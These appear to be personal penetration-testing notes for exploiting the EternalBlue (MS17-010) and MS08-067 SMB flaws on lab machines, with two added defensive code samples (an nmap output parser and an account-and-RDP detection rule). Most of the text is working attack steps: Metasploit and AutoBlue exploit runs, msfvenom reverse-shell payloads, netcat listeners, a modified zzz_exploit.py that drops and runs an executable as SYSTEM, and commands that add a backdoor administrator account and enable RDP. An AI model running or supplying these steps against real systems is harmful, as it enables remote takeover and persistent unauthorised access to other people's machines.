Eternal Blue

REF:

nmap

---------------------
nmap search and test:

PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds

> ls /usr/share/nmap/scripts/ | grep smb
.. smb-vuln-ms08-067.nse

> nmap --script vuln $IP
> nmap --script smb-vuln $IP -Pn -p 445
> nmap --script smb-vuln* $IP -p 139,445
> nmap --script smb-vuln-ms08-067 $IP -Pn -p 445
> nmap --script smb-vuln-ms17-010 $IP -sV -p 445

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
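Added example (not from these notes): a small Python parser for the "Host script results" block above, so smb-vuln-* output from many hosts can be triaged and handed to patch tracking; the sample output inside it is constructed, not a real scan.

```python
# Added example (not from the original notes): parse nmap's "Host script results"
# block for smb-vuln-* scripts into findings that can be triaged across many hosts.
import re
from dataclasses import dataclass, field

SAMPLE = """\
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    IDs:  CVE:CVE-2017-0143
|_smb-vuln-ms08-067: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-vuln-ms10-061:
|   NOT VULNERABLE:
|   Print Spooler Service Impersonation Vulnerability
|_    State: NOT VULNERABLE
"""  # constructed sample modelled on smb-vuln-* output, not a real scan

@dataclass
class Finding:
    script: str
    state: str = "UNKNOWN"   # VULNERABLE / NOT VULNERABLE / ERROR / UNKNOWN
    title: str = ""
    cves: list = field(default_factory=list)

def parse_host_script_results(text):
    """One Finding per smb-vuln-* script; tolerant of one-line error results."""
    findings, cur = [], None
    for raw in (ln for ln in text.splitlines() if ln.startswith("|")):  # "| " or "|_"
        line = raw.lstrip("|_").strip()
        head = re.match(r"^(smb-vuln-[\w-]+):\s*(.*)$", line)
        if head:
            cur = Finding(script=head.group(1))
            findings.append(cur)
            if head.group(2):              # e.g. "Could not negotiate a connection"
                cur.state, cur.title = "ERROR", head.group(2)
        elif cur is None or line.endswith("VULNERABLE:"):
            continue                       # section header, carries no data itself
        elif line.startswith("State:"):
            cur.state = line.split(":", 1)[1].strip()
        elif line.startswith("IDs:"):
            cur.cves += re.findall(r"CVE-\d{4}-\d+", line)
        elif line and not cur.title:
            cur.title = line
    return findings

def vulnerable(findings):
    """Map script -> CVE ids for every script that reported State: VULNERABLE."""
    return {f.script: f.cves for f in findings if f.state == "VULNERABLE"}
```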

Eternal Checker

git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

> python3 eternal_checker.py $IP
[*] Target OS: Windows 5.1
[!] The target is not patched  .. Vulnerable!!!

Eternal Blue - Metasploit

> sudo msfconsole
> search ms08-067
> search ms17-010  ..better

use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms17_010_eternalblue  ..better
set payload windows/x64/meterpreter/reverse_tcp  ..set after selecting the module
set rhost $IP
set lhost $MyIP
show options
exploit

meterpreter > cd "C:\\Documents and Settings\\john\\Desktop"  ..quote paths with spaces
meterpreter > cat user.txt
Flag !!!

AutoBlue - Metasploit

-----------------------------------
Prep: 
cd shellcode
./shell_prep.sh 

Auto generate a reverse shell with msfvenom? (Y/n) Y
LHOST for reverse connection   : 10.10.14.128
LPORT you want x64 to listen on: 4444
LPORT you want x86 to listen on: 6666
Type 0 for meterpreter shell 1 for regular cmd shell: 1
Type 0 staged payload or 1 for stageless payload    : 0

Generating x64 cmd shell (staged)...
msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=4444
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (staged)...
msfvenom -p windows/shell/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.128 LPORT=6666
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

-----------------------------------
Listener:

> ../listener_prep.sh 

LHOST for reverse connection    : 10.10.14.128
LPORT for x64 reverse connection: 4444
LPORT for x86 reverse connection: 6666
Enter 0 for meterpreter shell or 1 for regular cmd shell: 1
Type 0 for staged payload or 1 for a stageless payload  : 0

Metasploit Starts:
Starting listener (staged)...
Starting postgresql (via systemctl): postgresql.service
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
       =[ metasploit v5.0.88-dev                          ]
+ -- --=[ 2014 exploits - 1097 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
[*] Processing config.rc for ERB directives.
resource (config.rc)> use exploit/multi/handler
resource (config.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
resource (config.rc)> set LHOST 10.10.14.128
resource (config.rc)> set LPORT 4444
resource (config.rc)> set ExitOnSession false
resource (config.rc)> set EXITFUNC thread
EXITFUNC => thread
resource (config.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:4444 
resource (config.rc)> set LPORT 6666
resource (config.rc)> exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.128:6666 

msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                        Payload opts
  --  ----                    -------                        ------------
  0   Exploit: multi/handler  windows/x64/shell/reverse_tcp  tcp://10.10.14.128:4444
  1   Exploit: multi/handler  windows/shell/reverse_tcp      tcp://10.10.14.128:6666

------------------------------------
Was there another command to run? (I don't remember)

Connected!

Exploit7 - Shell Prep, AutoMerge, listen with Netcat

./shell_prep.sh
Auto generate with msfvenom? : Y
LHOST                        : $MyIP
LPORT x64                    : 4444
LPORT x86                    : 5555
regular cmd shell            : 1
stageless payload            : 1
32/64 generated, merged!!!

nc -lvnp 4444
nc -lvnp 5555  ..2 listeners

python eternalblue_exploit7.py $IP ./AutoBlue-MS17-010/shellcode/sc_all.bin

AutoBlue - No MSF - zzz_exploit.py

  • Needs: mysmb.py

  • If you are lucky, this might work without a custom payload

  • Needs a known/exposed named pipe and guest/anonymous access

  • Ex: legacy (HTB) .. worked; blue (HTB) .. failed

> python3 zzz_exploit.py $IP

[*] Target OS: Windows 5.1
[+] Found pipe 'browser'             ..pipe was known
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x820f3240
SESSION: 0xe10855a8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2148030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21480d0
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^) 
[!] Executing interactive programs will hang shell!

C:\WINDOWS\system32>whoami  ..system

Exploit7 - No MSF - Manual Merge

nasm -f bin ./shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=$MyIP --platform windows -a x64 --format raw -o sc_x64_payload.bin EXITFUNC=thread
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin

nasm -f bin ./shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=$MyIP --platform windows -a x86 --format raw -o sc_x86_payload.bin EXITFUNC=thread
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

python3 ./shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin

nc -nlvp 443                                    ..listener first
python3 eternalblue_exploit7.py $IP sc_all.bin
whoami ..system

AutoBlue - No MSF - zzz_exploit.py - Named Pipes

Payload
msfvenom -p windows/shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f exe -o exploit.exe

vi zzz_exploit.py                         .. creds at the top, file drop/exec in smb_pwn()
USERNAME = '//'                           .. Anonymous authentication
PASSWORD = ''                             .. User/Pass if you have one
print('creating file c:\\exploit.exe on the target')
fid2 = smbConn.createFile(tid2, '/exploit.exe')
smb_send_file(smbConn, '/full/path/exploit.exe', 'C', '/exploit.exe')
service_exec(conn, r'cmd /c c:\exploit.exe')

nc -nvlp 4444
python zzz_exploit.py <ip> [pipe_name]    .. usage
python zzz_exploit.py 10.x.x.x            .. pipe Problem

msfconsole                                .. not allowed for OSCP
search pipes                              .. get pipe_name
use 0  
use auxiliary/scanner/smb/pipe_auditor
options
set rhosts 10.x.x.x
run
\samr \ntsvcs \lsass \netlogon \browser   .. found Pipes

python zzz_exploit.py 10.x.x.x samr    
nc -nvlp 4444
C:\WINDOWS\system32>whoami                .. system

RDP Trick

C:\WINDOWS\system32>net user
C:\WINDOWS\system32>net user mikes hacks /add
C:\WINDOWS\system32>net localgroup administrators mikes /add

Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mikes -p hacks legacy
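Added example (not from these notes, defender side): detection logic that correlates the three Windows commands of this section (local account created, added to Administrators, fDenyTSConnections set to 0) over process-creation events; the host names, times, accounts and command lines in it are constructed.

```python
# Added example (not from the original notes): detection logic for the chain in
# this section (local account created, added to Administrators, RDP enabled via
# fDenyTSConnections=0) over constructed Security 4688 / Sysmon 1 command lines.
import re
from datetime import datetime, timedelta

STAGES = {  # case-insensitive command-line patterns, one per stage of the chain
    "user_add":   re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "admin_add":  re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "rdp_enable": re.compile(r"fDenyTSConnections\b.*\s/d\s+0\b", re.I),
}

# Constructed events (host, UTC time, account the process ran as, command line).
EVENTS = [
    ("WS01", "2024-05-01T10:00:05", r"NT AUTHORITY\SYSTEM", "net user"),
    ("WS01", "2024-05-01T10:00:09", r"NT AUTHORITY\SYSTEM", "net user mikes hacks /add"),
    ("WS01", "2024-05-01T10:00:14", r"NT AUTHORITY\SYSTEM", "net localgroup administrators mikes /add"),
    ("WS01", "2024-05-01T10:00:40", r"NT AUTHORITY\SYSTEM",
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("FS02", "2024-05-01T11:30:00", r"CORP\helpdesk", "net user svc_backup Winter2024! /add"),
]

def classify(cmd):
    """Return the stage a command line matches, or None for benign commands."""
    return next((name for name, rx in STAGES.items() if rx.search(cmd)), None)

def correlate(events, window=timedelta(minutes=15), min_stages=2):
    """Per host, collect the distinct stages seen inside one time window and alert
    once per window when at least min_stages of them appear."""
    by_host = {}
    for host, ts, user, cmd in events:
        stage = classify(cmd)
        if stage:
            by_host.setdefault(host, []).append((datetime.fromisoformat(ts), user, cmd, stage))
    alerts = []
    for host, evs in by_host.items():
        evs.sort()
        i = 0
        while i < len(evs):
            start = evs[i][0]
            chunk = [e for e in evs[i:] if e[0] - start <= window]
            seen = {stage: cmd for _, _, cmd, stage in chunk}
            if len(seen) >= min_stages:
                # the full chain, or any stage run as SYSTEM (which is what a kernel
                # SMB exploit hands over), is the high-severity case
                as_system = any(u.upper().endswith("SYSTEM") for _, u, _, _ in chunk)
                alerts.append({"host": host, "start": start, "stages": seen,
                               "severity": "high" if as_system or len(seen) == len(STAGES) else "medium"})
            i += len(chunk)
    return alerts
```

A single `net user ... /add` by a helpdesk account stays below the threshold, so the rule fires on the sequence rather than on routine account management.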
